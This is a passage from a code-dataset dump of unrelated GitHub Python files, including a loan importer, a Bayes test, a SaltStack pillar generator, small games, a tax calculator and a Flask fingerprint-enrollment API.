loan_date_as_float = loans_sheet.cell(r, 0).value\n loan_date = datetime.datetime(\n *xlrd.xldate_as_tuple(loan_date_as_float, data.datemode)\n )\n due_date_as_float = loans_sheet.cell(r, 1).value\n due_date = datetime.datetime(\n *xlrd.xldate_as_tuple(due_date_as_float, data.datemode)\n )\n loan_code = loans_sheet.cell(r, 2).value\n loan_amount = loans_sheet.cell(r, 3).value\n loan_status = loans_sheet.cell(r, 4).value\n customer_id = loans_sheet.cell(r, 5).value\n customer_station = loans_sheet.cell(r, 6).value\n\n values = (\n loan_date,\n due_date,\n loan_code,\n loan_amount,\n loan_status,\n customer_id,\n customer_station,\n )\n\n cursor.execute(query, values)\n\ncursor.close()\n\ndb.commit()\n\ndb.close()\n\ncolumns = str(loans_sheet.ncols)\nrows = str(loans_sheet.nrows)\n\nprint(\"I just imported {} columns and {} rows\".format(columns, rows))\n","repo_name":"PaulineMalova/Loan-Data","sub_path":"mysql/loans.py","file_name":"loans.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"7459912309","text":"import logging\nimport os\nimport unittest\nfrom typing import Callable\n\nimport probaspace\nimport bayes\n\n\ndef dice(count_side: int) -> Callable[[probaspace.Event], float]:\n def likelihood(event: probaspace.Event):\n if int(event.name) > count_side:\n return 0.\n else:\n return 1. / float(count_side)\n\n return likelihood\n\n\n
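# dice(n) yields a uniform likelihood (1/n) over faces 1..n and 0 beyond, which the\n# Bayesian estimator below uses to weigh each die hypothesis against observed rolls\n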
class ProbaspaceTest(unittest.TestCase):\n\n def test_dice(self):\n estimator = bayes.BayesAnalysis()\n #\n # estimator.create_hypothesis(Hypothesis(\"Smarties 94\", smarties94), 0.5)\n # estimator.create_hypothesis(Hypothesis(\"Smarties 96\", smarties96), 0.5)\n # estimator.add_event('R')\n # estimator.add_event('G')\n sides = probaspace.Universe.from_labels('1', '2', '3', '4', '5', '6')\n d4 = sides.create_random_variable_single(\"Dice 4\", likelihood=dice(4))\n d6 = sides.create_random_variable_single(\"Dice 6\", likelihood=dice(6))\n d8 = sides.create_random_variable_single(\"Dice 8\", likelihood=dice(8))\n d12 = sides.create_random_variable_single(\"Dice 12\", likelihood=dice(12))\n d20 = sides.create_random_variable_single(\"Dice 20\", likelihood=dice(20))\n\n estimator.define_uninformed(sides, d4, d6, d8, d12, d20)\n\n estimator.add_event(probaspace.Event('3'))\n estimator.add_event(probaspace.Event('4'))\n estimator.add_event(probaspace.Event('8'))\n estimator.add_event(probaspace.Event('3'))\n estimator.add_event(probaspace.Event('1'))\n self.assertAlmostEqual(estimator.evaluate(d12), 0.11532016915)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, format='%(asctime)s:%(name)s:%(levelname)s:%(message)s')\n file_handler = logging.FileHandler('{}.log'.format(os.path.basename(__file__).split('.')[0]), mode='w')\n formatter = logging.Formatter('%(asctime)s:%(name)s:%(levelname)s:%(message)s')\n file_handler.setFormatter(formatter)\n logging.getLogger().addHandler(file_handler)\n unittest.main()\n","repo_name":"webclinic017/BayesAnalysis","sub_path":"tests/test_probaspace.py","file_name":"test_probaspace.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"18286253086","text":"#!/usr/bin/env python\n# coding=utf8\n# Filename: node.py\n\n\nimport os\nimport yaml\n\n# define the /srv/pillar/top.sls file\npillar_top_conf = open('/srv/pillar/test/top.sls', 'w+')\n'''\n# open pillar_node_conf.txt, the per-node configuration file; note that it must be standard YAML, e.g.\nweb-ns-vm-10-10-10-30-huzhou.kx1d.com:\n server: 1000\n number: 1001\n money: 1002\n'''\nPillarNodeConf = open('pillar_node_conf.txt', 'r')\n# safe_load avoids constructing arbitrary Python objects from the YAML\nPillarNodeFile = yaml.safe_load(PillarNodeConf)\n# generate top.sls and the per-node pillar files in a for loop\nfor i in range(0,len(PillarNodeFile)):\n # take the dict key, i.e. the hostname\n key=PillarNodeFile.keys()[i]\n # take the host's values, i.e. the custom pillar variables\n values=PillarNodeFile[key]\n # rewrite the host's pillar file name into the web_ns.10-10-10-30-huzhou.sls format\n node_key=key.replace('\\n', '').replace('-ns','_ns').replace('-vm-','.').replace('-py-','.').replace('.kx1d.com','')\n pillar_top_conf_info= \"'\"+key+\"':\\n\" + \" - \" + node_key + \"\\n\" \n '''\n shell#cat top.sls \n 'web-ns-vm-10-10-10-30-huzhou.kx1d.com':\n - web_ns.10-10-10-30-huzhou\n '''\n pillar_top_conf.write(pillar_top_conf_info)\n\n # build the file name, e.g. web_ns.10-10-10-30-huzhou.sls\n node_pillar_sls=node_key+\".sls\"\n '''\n # write the pillar variables into the node file, e.g. web_ns.10-10-10-30-huzhou.sls \n server: 1000\n number: 1001\n money: 1002\n '''\n pillar_node_file = open(node_pillar_sls, 'a')\n for i in range(0,len(values)):\n serverkey = values.keys()[i]\n servervalues = values[serverkey]\n pillar_node_file_info= serverkey+\": \"+str(servervalues) + \"\\n\"\n pillar_node_file.write(pillar_node_file_info)\n\n PillarNodeConf.close()\n 
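# NOTE: both close() calls sit inside the outer loop; the YAML was fully parsed above,\n # so re-closing the config file is harmless, though closing it after the loop would be cleaner\n 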
pillar_node_file.close()\n","repo_name":"kuangling/Python","sub_path":"node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"6957649103","text":"import sys\r\n\r\ndef roman(n):\r\n return \"V\"\r\n\r\ndef assertEqual(first, second, msg=\"\"):\r\n if first != second:\r\n msg += \"\\n{0!r} != {1!r}\".format(first, second)\r\n raise AssertionError(msg)\r\n\r\ndef test_roman():\r\n assertEqual(roman(5), \"V\")\r\n\r\n print(\"All tests passed successfully.\")\r\n\r\nscript_name = sys.argv[0]\r\narguments = sys.argv[1:]\r\n\r\nUSAGE = \"Usage: {0} <number>\".format(script_name)\r\n\r\nif len(arguments) == 0 or len(arguments) > 1:\r\n print(USAGE)\r\nelif arguments[0] == \"test\":\r\n test_roman()\r\nelse:\r\n number = int(arguments[0])\r\n print(roman(number))\r\n","repo_name":"marthinajonsson/pythonCourse","sub_path":"python_160615/08-roman-numerals.py","file_name":"08-roman-numerals.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"27285427650","text":"import random\n\nprint(\"Hello! What is your name?\")\nname=input()\nrand1=random.randint(1,20)\nprint(f\"Well, {name}, I am thinking of a number between 1 and 20.\")\nans = 100\nguess = 1\nwhile ans != rand1:\n print(\"Take a guess\")\n ans=int(input())\n if ans > rand1:\n print(\"Your guess is too high.\")\n guess += 1\n elif ans < rand1:\n print(\"Your guess is too low\")\n guess += 1\n elif ans == rand1:\n print(f\"Good job, {name}! You guessed my number in {guess} guesses!\")","repo_name":"Abukhanifa/pp2","sub_path":"lab3/functions1/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"11948919752","text":"import sys\n\nif __name__ == '__main__':\n N = int(input())\n arr = [[] for _ in range(4)]\n\n for _ in range(N):\n a, b, c, d = map(int, sys.stdin.readline().split())\n arr[0].append(a); arr[1].append(b); arr[2].append(c); arr[3].append(d)\n ab_dic = dict()\n\n for a in arr[0]:\n for b in arr[1]:\n if a + b not in ab_dic:\n ab_dic[a + b] = 1\n else:\n ab_dic[a + b] += 1\n ans = 0\n for c in arr[2]:\n for d in arr[3]:\n if -(c + d) in ab_dic:\n ans += ab_dic[-(c + d)]\n print(ans)","repo_name":"Team-NTO/NTO","sub_path":"HyeonJinGithub/2021-03-15/7453 합이 0인 네 정수.py","file_name":"7453 합이 0인 네 정수.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"}
+{"seq_id":"15343699748","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport examples as exa\nimport scipy.integrate as si\nfrom plot_ex import plot_order, plot_contourn, eval_fun\nfrom integrators import HBr\nplt.rcParams['font.size'] = 20\n\nmethods = ['RB', 'RB_adap', 'EB', 'EB_adap']\n\n\n\ndef fig_comp(ex, dt, c, steps, save):\n    C = 0.1  # C = 2.302585093\n    m = 0.01\n    v = 1000\n    mu = 0.8\n    steps = 20000\n\n    p0_t = -HBr(ex, ex.x0, ex.p0, ex.x0_t, c)\n    init = [ex.x0, ex.x0_t, ex.p0, p0_t]\n    plt.figure(figsize=(8, 6))\n\n    fsol_RB = eval_fun('RB', params=[v, m, c, C, mu], dt=dt, steps=steps, ex=ex, init=init)\n    fsol_EB = eval_fun('EB', params=[v, m, c, C, mu], dt=dt, steps=steps, ex=ex, init=init)\n\n    plt.semilogy(fsol_RB, label='RB', linewidth=2, color='k', marker='h', fillstyle='none', markevery=int(steps / 15),\n                 
markersize=12)\n plt.semilogy(fsol_EB, label='EB', linewidth=2, color='blue',ls='dashed', marker='h', fillstyle='none', markevery=int(steps / 15),\n markersize=12)\n\n plt.legend(loc='upper right')\n plt.xlabel('Iteration')\n plt.ylabel('Function value')\n plt.legend(loc=3)\n plt.tight_layout()\n if save:\n plt.savefig('ex_Quartic' + '.png')\n\ndef orderf(fsol, ite):\n return np.log10(fsol[ite]) / np.log10(ite -1)\n\n\n\ndef plot_comp_order(ex, dt,steps, func, save):\n C =1\n m=0.01; v=1000; mu=0.8\n\n c=2\n p0_t = -HBr(ex, ex.x0, ex.p0, ex.x0_t, c)\n init =[ex.x0, ex.x0_t, ex.p0, p0_t]\n\n colors = ['b', 'r']\n styles = ['-', '--', '-.']\n marker=['<','H','d']\n order=[2,4,8]\n methods=['RB','EB']\n fig, ax = plt.subplots(figsize=(8,6))\n ite=1500\n tt=np.linspace(ite,steps,steps-ite+1)\n\n\n for cc, col in enumerate(colors):\n for ss, sty in enumerate(styles):\n fsol_RB = eval_fun(methods[cc], params=[v, m, order[ss], C, mu], dt=dt, steps=steps, ex=ex, init=init)\n ax.semilogy(fsol_RB, linewidth=2, color=colors[cc], ls=styles[ss])\n #order_num1 = np.log10(fsol_RB[-5000]) / np.log10(steps -1-5000)\n #order_num = [orderf(fsol_RB, 4000), orderf(fsol_RB, 8000),orderf(fsol_RB, steps-1)] #quadratic\n order_num = [orderf(fsol_RB, 1000), orderf(fsol_RB, 2000), orderf(fsol_RB, steps - 1)] #quartic\n print(methods[cc],order[ss], order_num)\n #ax.loglog(tt, tt**(order_num), '-m')\n #ax.semilogy(fsol_RB, linewidth=2, color=colors[cc], marker=marker[ss], fillstyle='none', markevery=int(steps / 15), markersize=12) # ls=styles[ss]\n\n for cc, col in enumerate(colors):\n ax.plot(np.NaN, np.NaN, c=colors[cc], linewidth=2, label=methods[cc])\n\n ax2 = ax.twinx()\n for ss, sty in enumerate(styles):\n #ax2.plot(np.NaN, np.NaN, marker=marker[ss],label=str(order[ss]), fillstyle='none', markevery=int(steps / 15), markersize=12, c='black')\n ax2.plot(np.NaN, np.NaN, ls=styles[ss], linewidth=2, label=str(order[ss]), c='black')\n ax2.get_yaxis().set_visible(False)\n\n ax.legend(loc=1)\n ax2.legend(title='Order',loc=3)\n\n plt.show()\n plt.tight_layout()\n if save:\n plt.savefig('figures/ex_comp_'+func + '.png')\n\n#ex=exa.Ex_Quartic_1(n=10)\n#plot_comp_order(ex, dt=1e-3,steps=4000, func='Quartic', save=True)\n#plot_contourn(ex, xmin=-10, xmax=10, ymin=-10, ymax=10, num_ex='Quartic',save=True)\n\nex = exa.Ex_Quadratic(n=100)\nplot_comp_order(ex, dt=1e-4, steps=4000, func='Quadratic', save=True)\nplot_contourn(ex, xmin=-10, xmax=10, ymin=-10, ymax=10, num_ex='Quadratic',save=True)\n\n\"\"\"\nex = exa.Ex_Quadratic(n=100)\nplot_comp_order(ex, dt=1e-4, steps=10000, func='Quadratic', save=True)\nplot_contourn(ex, xmin=-10, xmax=10, ymin=-10, ymax=10, num_ex='Quadratic',save=True)\n\n\nex = exa.Ex_Corr_Quadratic(n=50)\nplot_comp_order(ex, dt=1e-4, steps=10000, func='Corr_Quadratic', save=True)\nplot_contourn(ex, xmin=-10, xmax=10, ymin=-10, ymax=10, num_ex='Corr_Quadratic',save=True)\n\nex=exa.Ex_Quartic_1(n=10)\nplot_comp_order(ex, dt=1e-3,steps=4000, func='Quartic', save=True)\nplot_contourn(ex, xmin=-10, xmax=10, ymin=-10, ymax=10, num_ex='Quartic',save=True)\n\"\"\"\n\n\n\n\n#ex = exa.Ex_Schwefel(n=20)\n#plot_comp_order(ex, dt=1e-3, steps=50000, func='Quartic', save=True)\n#ex = exa.Ex_Three_hump()\n#plot_comp_order(ex, dt=1e-5, steps=10000, func='Three hump', save=True)\n\n","repo_name":"mdazatorres/Breg_dynamic_contact_algorithm","sub_path":"benchmark 
examples/plot_article_exs.py","file_name":"plot_article_exs.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"14383698006","text":"# -*- coding: utf-8 -*-\n\"\"\"Application configuration.\n\nMost configuration is set via environment variables.\n\nFor local development, use a .env file to set\nenvironment variables.\n\"\"\"\nfrom environs import Env\n\nenv = Env()\nenv.read_env()\n\nENV = env.str(\"FLASK_ENV\", default=\"production\")\nDEBUG = ENV == \"development\"\nSQLALCHEMY_DATABASE_URI = env.str(\"DATABASE_URL\")\nSECRET_KEY = env.str(\"SECRET_KEY\")\nSEND_FILE_MAX_AGE_DEFAULT = env.int(\"SEND_FILE_MAX_AGE_DEFAULT\")\nBCRYPT_LOG_ROUNDS = env.int(\"BCRYPT_LOG_ROUNDS\", default=13)\nDEBUG_TB_ENABLED = DEBUG\nDEBUG_TB_INTERCEPT_REDIRECTS = False\nCACHE_TYPE = \"simple\" # Can be \"memcached\", \"redis\", etc.\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\nALLOWED_EXTENSIONS_FILES = set(['png', 'jpg', 'jpeg', 'gif','xls','xlsx'])\n\nUPLOADED_PATH = 'data/uploads/'\nSTUDENTS_IMG = 'data/students_img/'\n\n# SMS verification code\nSMS_KEY = env.str(\"SMS_KEY\")\nSMS_CODE_URL = env.str(\"SMS_CODE_URL\")\nSMS_CODE_TPLID = env.str(\"SMS_CODE_TPLID\")\n","repo_name":"anaf007/single_school","sub_path":"main/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"23116123875","text":"import sys\r\nimport heapq\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\ngraph = [[] for _ in range(n + 1)]\r\n\r\nfor i in range(m):\r\n a, b, c = map(int, input().split())\r\n graph[a].append((b, c))\r\n graph[b].append((a, c))\r\n\r\nd = [[0] * n for i in range(n)]\r\nfor i in range(1, n + 1):\r\n heap = []\r\n distance = [sys.maxsize for _ in range(n + 1)]\r\n heapq.heappush(heap, (0, i))\r\n\r\n while heap:\r\n cost, num = heapq.heappop(heap)\r\n if distance[num] < cost:\r\n continue\r\n\r\n for nnum, ncost in graph[num]:\r\n if distance[nnum] > ncost + cost:\r\n distance[nnum] = ncost + cost\r\n d[nnum - 1][i - 1] = num\r\n heapq.heappush(heap, (ncost + cost, nnum))\r\n\r\nfor i in range(n):\r\n for j in range(n):\r\n if i == j:\r\n print('-', end=' ')\r\n else:\r\n print(d[i][j], end=' ')\r\n print()","repo_name":"ShinJongUng/BOJ-baekjoon-Algorithm","sub_path":"백준/Gold/1719. 
택배/택배.py","file_name":"택배.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"6415019612","text":"#!/usr/bin/env python3\n\nimport sys\nimport csv\n\n\nclass Args(object):\n\n\tdef __init__(self):\n\t\tself.args = sys.argv[1:]\n\t\tself.indexc = self.args.index('-c')\n\t\tself.indexd = self.args.index('-d')\n\t\tself.indexo = self.args.index('-o')\n\t\tself.configpath = self.args[self.indexc+1]\n\t\tself.userpath = self.args[self.indexd+1]\n\t\tself.gongzipath = self.args[self.indexo+1]\n\nclass Config(object):\n\n\tdef __init__(self):\n\t\tself.config = self._read_config()\n\n\tdef _read_config(self):\n\t\tconfig = {}\n\t\twith open(challenge3.configpath, 'r') as configfile:\n\t\t\t# iterate over the file directly; calling readline() inside the loop skipped every other line\n\t\t\tfor line in configfile:\n\t\t\t\tself.a = line\n\t\t\t\tself.a0 = self.a.split('=')[0].strip()\n\t\t\t\tself.a1 = self.a.split('=')[1].strip()\n\t\t\t\tconfig[self.a0] = self.a1\n\n\t\treturn config\nclass UserData(object):\n\n\tdef __init__(self):\n\t\tself.userdata = self._read_users_data()\n\n\tdef _read_users_data(self):\n\t\tuserdata = {}\n\t\twith open(challenge3.userpath, 'r') as userdatafile:\n\t\t\tfor line in userdatafile:\n\t\t\t\tself.a = line\n\t\t\t\tself.a0 = self.a.split(',')[0].strip()\n\t\t\t\tself.a1 = self.a.split(',')[1].strip()\n\t\t\t\tuserdata[self.a0] = self.a1\n\t\treturn userdata\nclass IncomeTaxCalculator(object):\n\tdef __init__(self):\n\t\tself.rate = 0\n\t\tfor key in Config.config.keys():\n\t\t\tif key == 'JiShuL' or key == 'JiShuH':\n\t\t\t\tself.rate = self.rate\n\t\t\telse:\n\t\t\t\tself.rate += float(Config.config[key])\n\t\ttax = {}\n\t\twith open(challenge3.userpath, 'r') as userfile:\n\t\t\tfor line in userfile:\n\t\t\t\ta = line\n\t\t\t\ta0 = a.split(',')[0].strip()\n\t\t\t\ta1 = float(a.split(',')[1].strip())\n\t\t\t\tYing = a1 - self.rate * a1 - 3500\n\t\t\t\tif Ying <= 1500:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.03 - 0\n\t\t\t\telif Ying > 1500 and Ying <= 4500:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.10 - 105\n\t\t\t\telif Ying > 4500 and Ying <= 9000:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.20 - 555\n\t\t\t\telif Ying > 9000 and Ying <= 35000:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.25 - 1005\n\t\t\t\telif Ying > 35000 and Ying <= 55000:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.30 - 2755\n\t\t\t\telif Ying > 55000 and Ying <= 80000:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.35 - 5505\n\t\t\t\telse:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.45 - 13505\n\t\t\t\tif tax[a0] < 0:\n\t\t\t\t\ttax[a0] = 0\n\t\tself.tax = tax\n\n\t\tshebao = {}\n\t\tgongzi = {}\n\t\twith open(challenge3.userpath, 'r') as userfile:\n\t\t\tfor line in userfile:\n\t\t\t\ta = line\n\t\t\t\ta0 = a.split(',')[0].strip()\n\t\t\t\ta1 = float(a.split(',')[1].strip())\n\t\t\t\tshebao[a0] = a1 * self.rate\n\t\t\t\tgongzi[a0] = a1 - self.tax[a0] - shebao[a0]\n\n\t\tself.shebao = shebao\n\t\tself.gongzi = gongzi\n\n\t\tresult = []\n\t\twith open(challenge3.userpath, 'r') as userfile:\n\t\t\tfor line in userfile:\n\t\t\t\ta = line\n\t\t\t\ta0 = a.split(',')[0].strip()\n\t\t\t\ta1 = float(a.split(',')[1].strip())\n\t\t\t\tusernum = a0\n\t\t\t\tpresalary = format(a1, \".2f\")\n\t\t\t\tbaojin = format(self.shebao[usernum], \".2f\")\n\t\t\t\tshui = format(self.tax[usernum], \".2f\")\n\t\t\t\t
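# net pay = gross salary - social insurance - income tax\n\t\t\t\t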
\".2f\")\n\t\t\t\tresult.append([usernum,presalary,baojin,shui,aftersalary])\n\t\tself.result = result\n\t\t# return self.result\n\tdef export(self, default='csv'):\n\t\tresult = self.result\n\t\twith open(challenge3.gongzipath, 'w') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerows(result)\n\n\t\t\nif __name__ == '__main__':\n\n\tchallenge3 = Args()\n\tConfig = Config()\n\tUserData = UserData()\n\tIncomeTaxCalculator = IncomeTaxCalculator()\n\tprint(Config.config)\n\tprint(UserData.userdata)\n\t# print(IncomeTaxCalculator.rate)\n\tprint(Config.config.keys())\t#gonghao 1 2\n\tprint(IncomeTaxCalculator.tax)\t#shui 4\n\tprint(IncomeTaxCalculator.shebao)\t#shebao 3\n\tprint(IncomeTaxCalculator.gongzi)\n\tprint(IncomeTaxCalculator.result)\n\tIncomeTaxCalculator.export()\n\n","repo_name":"ltd0215/CodeOfChallenge","sub_path":"calculator3.py","file_name":"calculator3.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70638088854","text":"# ** Guess the number\r\n# ** Task description:\r\n'''\r\nThe daily life of Shri Ram in Gurukul includes Education sessions from the Guru, Sparring to increase experience in Sastra-Vidya and Strict meals in between. Sometimes though, Sree Ram gets free time and this happened to be one such time. While enjoying one such free time with his friends, one of his friends suggested Shri Ram and the others play a game he had recently learned.\r\nMake that game so that Shri Ram and his friends can enjoy it.\r\n\r\n'''\r\n\r\n# ** Task details:\r\n'''\r\nCreate a “Guess the Number” game on Python.\r\nWhen the game starts, it will prompt the user to enter the name of the player and the range (both upper and lower limit) of the number within which the user will have to guess.\r\nFollowing this, the game will generate a random number under the range and prompt the user to insert their guess.\r\nNow, the guess is checked with the original number and the user will be informed if their guess was “Too High” or “Too Low”.\r\nThe users will be appointed 100 points at the start of the Game.\r\nIf they get the guess wrong, a total of 5 points will be deducted from the user's Total Points.\r\nThese points need to be tracked till the end of the number of rounds that the user entered when the game started and will be shown to the user during and at the end of the game.\r\nThe game ends if the user gets the correct guess for the number or if they run out of points.\r\n'''\r\n\r\nimport random\r\n\r\nprint(\"please enter your name to start the Guess the Number game: \")\r\nstring = input()\r\nprint(\"hello, \" + string + \" let's start the game\")\r\nprint(\"enter the range so that we can start the game: \")\r\nvar1 = int(input(\"enter the first number: \"))\r\nvar2 = int(input(\"enter the second number: \"))\r\n\r\nn = random.randrange(var1,var2)\r\ncount = 100\r\nprint(\"ok, so now that you have entered the range you can start guessing: \")\r\n\r\nwhile(count > 0):\r\n guess = int(input(\"enter the number: \"))\r\n if(guess == n):\r\n print(\"hurray, you guessed the number right\")\r\n break;\r\n else:\r\n if(guess < n):\r\n print(\"Too low\")\r\n count-=5\r\n else:\r\n print(\"Too high\")\r\n count-=5\r\n\r\nif(count <= 0):\r\n print(\"sorry, you can't play further as you dont have points left to further go in this game\") 
","repo_name":"santr4/C3-Task","sub_path":"EASY/Task_1.py","file_name":"Task_1.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"14524446874","text":"from flask import Flask, jsonify, request, abort\nimport json\nfrom utils import add_datapoint, get_user_from_finger, check_email_exist, delete_email, reset_database, get_alldata\n\napplication = Flask(__name__)\n\n@application.route('/')\ndef homepage():\n return \"RESTFUL API for FingerVein Running ver-003\"\n\n@application.route('/enroll', methods=['POST'])\ndef enroll():\n if not request.json or \"first\" not in request.json \\\n or \"last\" not in request.json \\\n or \"email\" not in request.json \\\n or \"fingertemplate\" not in request.json \\\n or \"fingerverificationtemplate\" not in request.json:\n return jsonify({\"statuscode\" : 400,\n \"description\" : \"No / Incomplete data given for enrollment\"}), 400\n \n new_user = {\n \"first\" : request.json[\"first\"],\n \"last\" : request.json[\"last\"],\n \"email\" : request.json[\"email\"],\n \"fingertemplate\" : request.json[\"fingertemplate\"],\n \"fingerverificationtemplate\" : request.json[\"fingerverificationtemplate\"]\n }\n if not add_datapoint(new_user):\n return jsonify({\"statuscode\" : -1,\n \"description\" : \"User already exists\"}), 200\n return jsonify({\"statuscode\" : 0,\n \"description\" : \"User successfully added\"}), 200\n\n@application.route('/authenticate', methods=['POST'])\ndef authentication():\n if not request.json or \"fingertemplate\" not in request.json:\n return jsonify({\"statuscode\" : 400,\n \"description\" : \"No finger template provided\"}), 400\n \n fingercode = request.json[\"fingertemplate\"]\n response, responsedata = get_user_from_finger(fingercode)\n if response == -1:\n return jsonify({\"statuscode\" : -1,\n \"description\" : \"Finger template not authenticated\"}), 200\n return jsonify({\"statuscode\" : 0,\n \"description\" : \"User authenticated\",\n \"data\" : responsedata}), 200\n\n@application.route('/checkexists', methods=['POST'])\ndef checkexists():\n if not request.json or \"email\" not in request.json:\n return jsonify({\"statuscode\" : 400,\n \"description\" : \"No email provided\"}), 400\n\n email = request.json[\"email\"]\n response = check_email_exist(email)\n if response:\n return jsonify({\"statuscode\" : 0,\n \"description\" : \"User with this email exists\"}), 200\n return jsonify({\"statuscode\" : -1,\n \"description\" : \"User with this email does not exist\"}), 200\n\n@application.route('/delete', methods=['POST'])\ndef delete():\n if not request.json or \"email\" not in request.json:\n return jsonify({\"statuscode\" : 400,\n \"description\" : \"No email provided\"}), 400\n\n email = request.json[\"email\"]\n response = delete_email(email)\n if response:\n return jsonify({\"statuscode\" : 0,\n \"description\" : str(response) + \" record(s) deleted\"}), 200\n return jsonify({\"statuscode\" : -1,\n \"description\" : \"No entry found with the given email\"}), 200\n\n@application.route('/reset', methods=['GET'])\ndef reset():\n response = reset_database()\n return jsonify({\"statuscode\" : 0,\n \"description\" : str(response) + \" (ALL) record(s) deleted\"}), 200\n\n@application.route('/returndata', methods=['GET'])\ndef returndata():\n data = get_alldata()\n return jsonify({\"statuscode\" : 0,\n \"description\" : \"All data returned\",\n \"data\" : data}), 200\n\nif __name__ == '__main__':\n 
application.run(host=\"0.0.0.0\", port=80)","repo_name":"prasang-gupta/FingerveinScannerApp","sub_path":"api/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"12904155028","text":"# Imports\nimport random\nfrom les_meves_funcions.funcions_consultesDB import *\nimport les_meves_funcions.funcions_menu\n\n\ndef new_name():\n    while True:\n        name = input(\"Name: \")\n        try:\n            if name == \"\":\n                raise ValueError(\"Name cannot be empty\")\n            elif not name.isalnum():\n                raise ValueError(\"Name must be letters or numbers only\")\n        except ValueError as error:\n            print(error)\n        else:\n            break\n    return name\n\n\ndef new_nif(human):\n    # Check the DNI number when creating a new player\n    resultado = SelectBBDD(\"Select player_id from player\")\n    exist_id = []\n    for i in range(len(resultado)):\n        exist_id.append(resultado[i][0])\n    while True:\n        if human:\n            dni = input(\"Enter NIF: \")\n            # Check that exactly 9 characters were entered.\n            try:\n                if not len(dni) == 9:\n                    raise ValueError(\"Incorrect length.\")\n                # It must consist of 8 digits and 1 letter.\n                elif not dni[:8].isdigit() or not dni[8].isalpha():\n                    raise ValueError(\"Incorrect format.\")\n                # Check that the matching control letter was entered.\n                elif not letrasDni[int(dni[:8]) % 23] == dni[8].upper():\n                    raise ValueError(\"Incorrect letter.\")\n                # Check whether the DNI is already registered to another client.\n                elif dni.upper() in exist_id:\n                    raise ValueError(\"ID: {} already exists\".format(dni))\n                else:\n                    break\n            except ValueError as error:\n                print(error)\n            except IndexError:\n                print(\"Incorrect format.\")\n        else:\n            dni = \"\"\n            for i in range(1, 9):\n                dni += str(random.randint(1, 9))\n            dni = dni + letrasDni[random.randrange(0, len(letrasDni))]\n            break\n    return dni.upper()\n\n\ndef player_profile():\n    profile = menuSelectType()\n    return profile\n\n\ndef save_player(name, dni, profile, human_bool):\n    if profile == 30:\n        name_prof = \"Cautious\"\n    elif profile == 40:\n        name_prof = \"Moderated\"\n    elif profile == 50:\n        name_prof = \"Bold\"\n    print(\"*\" * 95 + \"\\n\" + figlet_format(\" \" * 24 + \"New Player\", font=\"doom\") + \"*\" * 95 + \"\\n\\n\" +\n          \"Name: \" + name + \"\\n\" + \"DNI: \" + dni + \"\\n\" + \"Profile: \" + name_prof + \"\\n\")\n    while True:\n        save = input(\"Save player? 
Y/N: \")\n        if save.upper() == \"Y\":\n            return True\n        elif save.upper() == \"N\":\n            print(\"Player discarded.\")\n            return False\n        else:\n            print(\"Incorrect option.\")\n\n\ndef menuSelectType():\n    while True:\n        opt = les_meves_funcions.funcions_menu.getOpt(menus[\"menuSelectType\"][\"header\"],\n                                                      menus[\"menuSelectType\"][\"textOpts\"],\n                                                      menus[\"menuSelectType\"][\"inputOptText\"],\n                                                      menus[\"menuSelectType\"][\"rangeList\"], {}, [])\n        if opt == 1:\n            profile = 30\n            return profile\n        if opt == 2:\n            profile = 40\n            return profile\n        if opt == 3:\n            profile = 50\n            return profile\n        else:\n            break\n\n\ndef newPlayer_human():\n    print(\"*\" * 95 + \"\\n\" +\n          figlet_format(\" \" * 24 + \"New Player\", font=\"doom\") +\n          \"*\" * 95 + \"\\n\")\n    name = new_name()\n    dni = new_nif(1)\n    print(\"\\n\", \"*\"*95, \"\\nName: \", name, \"\\nDNI: \", dni)\n    profile = player_profile()\n    save = save_player(name, dni, profile, 1)\n    if save:\n        query = \"INSERT INTO player VALUES ('{}','{}',{},{})\".format(dni, name, profile, 1)\n        InputBBDD(query)\n        print(\"Player saved\")\n    else:\n        return\n\n\ndef newPlayer_boot():\n    print(\"*\" * 95 + \"\\n\" +\n          figlet_format(\" \" * 24 + \"New Player\", font=\"doom\") +\n          \"*\" * 